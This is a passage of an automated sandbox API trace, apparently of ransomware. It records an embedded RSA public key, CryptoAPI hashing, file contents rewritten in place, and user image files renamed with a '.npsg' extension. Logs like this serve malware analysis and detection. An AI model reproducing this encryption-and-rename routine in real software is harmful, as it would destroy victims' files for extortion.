KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.408] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.409] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.409] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.409] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.409] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.409] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.409] GetLastError () returned 0x0 [0238.409] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.409] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.409] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.410] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.410] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.410] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xdde0) returned 0x3b95d50 [0238.410] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0238.410] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0238.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0238.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0238.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b85ce8 [0238.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34009e0 [0238.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b85d30 [0238.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34009f8 [0238.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400a28 [0238.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400a88 [0238.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400a40 [0238.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0238.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0238.411] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a28 | out: hHeap=0x620000) returned 1 [0238.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a40 | out: hHeap=0x620000) returned 1 [0238.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a88 | out: hHeap=0x620000) returned 1 [0238.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0238.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400a88 [0238.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0238.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400a40 [0238.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0238.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400a28 [0238.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0238.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7ba60 [0238.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0238.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0238.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7bb78 [0238.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0238.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0238.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0238.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a40 | out: hHeap=0x620000) returned 1 [0238.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a28 | out: hHeap=0x620000) returned 1 [0238.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0238.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a88 | out: hHeap=0x620000) returned 1 [0238.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0238.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0238.412] GetCurrentThreadId () returned 0x5b4 [0238.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0238.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b83b48 [0238.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0238.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0238.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0238.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0238.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0238.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.413] GetCurrentThreadId () returned 0x5b4 [0238.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0238.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0238.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0238.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0238.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0238.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400a88 [0238.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0238.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0238.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0238.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0238.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0238.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400a28 [0238.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0238.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0238.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0238.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0238.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400a40 [0238.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0238.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0238.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0238.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400a10 [0238.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0238.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400aa0 [0238.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0238.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0238.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400a70 [0238.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400a58 [0238.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400ab8 [0238.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a58 | out: hHeap=0x620000) returned 1 [0238.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400a58 [0238.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a70 | out: hHeap=0x620000) returned 1 [0238.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0238.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0238.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0238.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a28 | out: hHeap=0x620000) returned 1 [0238.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400a28 [0238.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0238.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a88 | out: hHeap=0x620000) returned 1 [0238.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0238.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ab8 | out: hHeap=0x620000) returned 1 [0238.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0238.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b830 [0238.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0238.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0238.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a28 | out: hHeap=0x620000) returned 1 [0238.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fa10 [0238.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0238.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0238.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0238.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0238.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0238.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0238.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0238.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0238.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a58 | out: hHeap=0x620000) returned 1 [0238.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0238.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400aa0 | out: hHeap=0x620000) returned 1 [0238.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0238.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a40 | out: hHeap=0x620000) returned 1 [0238.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a10 | out: hHeap=0x620000) returned 1 [0238.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0238.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0238.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0238.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34009f8 | out: hHeap=0x620000) returned 1 [0238.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b85d30 | out: hHeap=0x620000) returned 1 [0238.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0238.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0238.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0238.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0238.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0238.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0238.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0238.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0238.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.418] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0xddd5, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0xddd5, lpOverlapped=0x0) returned 1 [0238.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0238.419] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xddda, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.419] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0238.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7caa0 [0238.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x346fa10 [0238.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x346fa10, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0238.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b86cd0 [0238.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7caa0 | out: hHeap=0x620000) returned 1 [0238.420] WriteFile (in: hFile=0x644, lpBuffer=0x3b86cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b86cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0238.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b86cd0 | out: hHeap=0x620000) returned 1 [0238.420] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.420] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.420] CloseHandle (hObject=0x644) returned 1 [0238.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e5f8 [0238.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b86cd0 [0238.424] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\L2BuYy0GjuwfspGY.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\l2buyy0gjuwfspgy.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\L2BuYy0GjuwfspGY.gif.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\l2buyy0gjuwfspgy.gif.npsg")) returned 1 [0238.426] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8283b080, ftCreationTime.dwHighDateTime=0x1d5c248, ftLastAccessTime.dwLowDateTime=0xd8817750, ftLastAccessTime.dwHighDateTime=0x1d5bf06, ftLastWriteTime.dwLowDateTime=0xd8817750, ftLastWriteTime.dwHighDateTime=0x1d5bf06, nFileSizeHigh=0x0, nFileSizeLow=0x12aa6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="o1QQvYkI-4KiVQ.jpg", cAlternateFileName="O1QQVY~1.JPG")) returned 1 [0238.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70df58 [0238.426] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\o1QQvYkI-4KiVQ.jpg") returned=".jpg" [0238.426] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\o1QQvYkI-4KiVQ.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\o1qqvyki-4kivq.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.426] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=76454) returned 1 [0238.426] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.429] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x12a80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.429] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.431] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x12aa6, lpOverlapped=0x0) returned 1 [0238.432] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.432] lstrlenA (lpString="-----BEGIN PUBLIC 